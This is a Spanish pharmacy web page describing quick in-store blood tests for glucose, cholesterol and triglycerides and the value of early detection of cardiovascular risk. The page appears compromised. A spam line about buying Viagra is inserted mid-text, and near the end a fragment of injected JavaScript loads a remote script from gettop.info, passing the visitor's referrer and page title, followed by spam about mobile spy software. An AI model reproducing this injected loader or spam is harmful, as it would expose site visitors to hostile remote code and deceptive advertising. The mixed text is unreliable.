Análisis de algunos parámetros sanguíneos: Glucosa, Colesterol y Triglicéridos

El servicio de análisis de sangre que ofrece la oficina de farmacia comprende 3 parámetros, que son GLUCOSA, COLESTEROL y TRIGLICERIDOS.

En este vídeo se muestra como se realizan las pruebas en la farmacia, de una manera sencilla y con resultados rápidos.

can i buy viagra at a store in pa ACCUTRENDPICTURE

Los niveles de colesterol total, triglicéridos y glucemia pueden utilizarse para identificar personas con riesgo cardiovascular. Un control frecuente de estos parámetros proporciona información importante acerca de la evolución de la enfermedad.

La detección precoz es fundamental.

La ECV (Enfermedad Cardio Vascular) se asocia con la ateroesclerosis, y a menudo tiene su origen en ésta. Si se deja  progresar, la consecuencia puede ser un infarto de miocardio, una apoplejía y posiblemente la muerte. La mejor manera de reducir la carga de la enfermedad es la prevención primaria y la detección precoz.

El control frecuente marca la diferencia.  Un número importante de pacientes de  atención primaria padecen dislipidemia  y, por lo tanto, presentan un mayor  riesgo de ECV. Por otra parte, muchos pacientes con trastornos lipídicos reciben un tratamiento insuficiente o no están en tratamiento. Los controles inmediatos pueden ayudar a mejorar de manera notable la identificación y el control de pacientes dislipidémicos en el ámbito de la atención primaria.

} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; The most popular 2017 spy software applications for the mobile phones.

Comments are closed.